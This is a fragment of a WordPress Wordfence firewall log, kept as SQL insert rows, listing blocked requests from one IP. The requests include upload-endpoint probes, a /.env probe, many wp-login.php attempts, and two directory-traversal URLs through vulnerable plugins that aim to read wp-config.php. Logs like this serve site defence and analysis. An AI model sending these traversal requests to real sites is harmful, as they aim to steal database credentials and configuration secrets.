(4911, 1595039466.696860, 1595039466.160100, 0x00000000000000000000ffff2875ea21, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/barclaycart/uploadify/uploadify.php', NULL, 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0', 'blocked:waf', 'Malicious File Upload (Patterns)', '{\"learningMode\":0,\"failedRules\":\"68\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9iYXJjbGF5Y2FydC91cGxvYWRpZnkvdXBsb2FkaWZ5LnBocA==\",\"category\":\"file_upload\",\"ssl\":0}'),
(4912, 1595039465.605694, 1595039465.107400, 0x00000000000000000000ffff2875ea21, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-admin/admin-ajax.php?action=getcountryuser&cs=2', NULL, 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0', 'blocked:waf', 'Malicious File Upload (Patterns)', '{\"learningMode\":0,\"failedRules\":\"68\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"file_upload\",\"ssl\":0}'),
(4913, 1595039475.056163, 1595039474.995400, 0x00000000000000000000ffff2875ea21, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/ungallery/source_vuln.php?pic=..%2F..%2F..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twaWNd\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bmdhbGxlcnkvc291cmNlX3Z1bG4ucGhw\",\"category\":\"lfi\",\"ssl\":0}'),
(4914, 1595039474.726798, 1595039474.682700, 0x00000000000000000000ffff2875ea21, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=..%2F..%2F..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1zdXBwb3J0LXBsdXMtcmVzcG9uc2l2ZS10aWNrZXQtc3lzdGVtL2luY2x1ZGVzL2FkbWluL2Rvd25sb2FkQXR0YWNobWVudC5waHA=\",\"category\":\"lfi\",\"ssl\":0}'),
(4915, 1595039474.403280, 1595039473.963000, 0x00000000000000000000ffff2875ea21, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-admin/admin-post.php', NULL, 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0', 'blocked:waf', 'Malicious File Upload (Patterns)', '{\"learningMode\":0,\"failedRules\":\"68\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"file_upload\",\"ssl\":0}'),
(4916, 0.000000, 1595039480.457511, 0x00000000000000000000ffff2875ea21, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4917, 0.000000, 1595039480.557057, 0x00000000000000000000ffff2875ea21, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4918, 0.000000, 1595039480.362141, 0x00000000000000000000ffff2875ea21, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4919, 0.000000, 1595039480.611148, 0x00000000000000000000ffff2875ea21, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4920, 0.000000, 1595039480.661360, 0x00000000000000000000ffff2875ea21, 0, 200, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0', 'loginFailInvalidUsername', NULL, NULL),
(4921, 1595039486.726777, 1595039486.694000, 0x00000000000000000000ffff2875ea21, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/.env', NULL, 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"Ly5lbnY=\"}'),
(4922, 1595039486.301976, 1595039486.242000, 0x00000000000000000000ffff2875ea21, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4923, 1595039486.103814, 1595039486.078300, 0x00000000000000000000ffff2875ea21, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4924, 1595039486.028950, 1595039485.978400, 0x00000000000000000000ffff2875ea21, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4925, 1595039485.932799, 1595039485.872500, 0x00000000000000000000ffff2875ea21, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4926, 1595039485.831095, 1595039485.773900, 0x00000000000000000000ffff2875ea21, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4927, 1595039485.728238, 1595039485.673800, 0x00000000000000000000ffff2875ea21, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4928, 1595039485.625490, 1595039485.573500, 0x00000000000000000000ffff2875ea21, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4929, 1595039485.527573, 1595039485.473400, 0x00000000000000000000ffff2875ea21, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4930, 1595039485.440990, 1595039485.376700, 0x00000000000000000000ffff2875ea21, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4931, 1595039485.334010, 1595039485.277100, 0x00000000000000000000ffff2875ea21, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4932, 1595039485.247550, 1595039485.189200, 0x00000000000000000000ffff2875ea21, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4933, 1595039485.128672, 1595039485.074900, 0x00000000000000000000ffff2875ea21, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4934, 1595039485.033067, 1595039484.974800, 0x00000000000000000000ffff2875ea21, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4935, 1595039484.817416, 1595039484.781300, 0x00000000000000000000ffff2875ea21, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4936, 1595039484.698951, 1595039484.671900, 0x00000000000000000000ffff2875ea21, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4937, 1595039484.600482, 1595039484.574300, 0x00000000000000000000ffff2875ea21, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4938, 1595039484.504368, 1595039484.478100, 0x00000000000000000000ffff2875ea21, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4939, 1595039484.398884, 1595039484.373300, 0x00000000000000000000ffff2875ea21, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4940, 1595039484.299476, 1595039484.273700, 0x00000000000000000000ffff2875ea21, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4941, 1595039484.200644, 1595039484.175800, 0x00000000000000000000ffff2875ea21, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4942, 1595039484.105747, 1595039484.080100, 0x00000000000000000000ffff2875ea21, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4943, 1595039484.002548, 1595039483.976000, 0x00000000000000000000ffff2875ea21, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4944, 1595039483.905887, 1595039483.872900, 0x00000000000000000000ffff2875ea21, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4945, 1595039483.802454, 1595039483.777200, 0x00000000000000000000ffff2875ea21, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4946, 1595039483.696058, 1595039483.670600, 0x00000000000000000000ffff2875ea21, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4947, 1595039483.606121, 1595039483.567100, 0x00000000000000000000ffff2875ea21, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4948, 1595039483.505140, 1595039483.467400, 0x00000000000000000000ffff2875ea21, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4949, 1595039483.406894, 1595039483.368100, 0x00000000000000000000ffff2875ea21, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4950, 1595039483.292073, 1595039483.264300, 0x00000000000000000000ffff2875ea21, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4951, 1595039483.205172, 1595039483.173600, 0x00000000000000000000ffff2875ea21, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4952, 1595039483.094337, 1595039483.065900, 0x00000000000000000000ffff2875ea21, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4953, 1595039483.002754, 1595039482.977400, 0x00000000000000000000ffff2875ea21, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4954, 1595039482.894983, 1595039482.867600, 0x00000000000000000000ffff2875ea21, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}');
INSERT INTO `zdenl_wfhits` (`id`, `attackLogTime`, `ctime`, `IP`, `jsRun`, `statusCode`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`, `action`, `actionDescription`, `actionData`) VALUES
(4955, 1595039482.793041, 1595039482.767100, 0x00000000000000000000ffff2875ea21, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4956, 1595039482.698744, 1595039482.672300, 0x00000000000000000000ffff2875ea21, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4957, 1595039482.612961, 1595039482.587200, 0x00000000000000000000ffff2875ea21, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4958, 1595039482.606994, 1595039482.581100, 0x00000000000000000000ffff2875ea21, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4959, 1595039482.605197, 1595039482.577500, 0x00000000000000000000ffff2875ea21, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4960, 1595039482.589360, 1595039482.560300, 0x00000000000000000000ffff2875ea21, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4961, 1595039482.583472, 1595039482.558000, 0x00000000000000000000ffff2875ea21, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4962, 1595039482.579292, 1595039482.553400, 0x00000000000000000000ffff2875ea21, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4963, 1595039482.566050, 1595039482.538400, 0x00000000000000000000ffff2875ea21, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4964, 1595039482.557920, 1595039482.532300, 0x00000000000000000000ffff2875ea21, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4965, 1595039482.556715, 1595039482.531000, 0x00000000000000000000ffff2875ea21, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4966, 1595039482.543450, 1595039482.505600, 0x00000000000000000000ffff2875ea21, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4967, 1595039482.529634, 1595039482.481200, 0x00000000000000000000ffff2875ea21, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4968, 1595039482.524471, 1595039482.470000, 0x00000000000000000000ffff2875ea21, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4969, 1595039482.512078, 1595039482.459200, 0x00000000000000000000ffff2875ea21, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
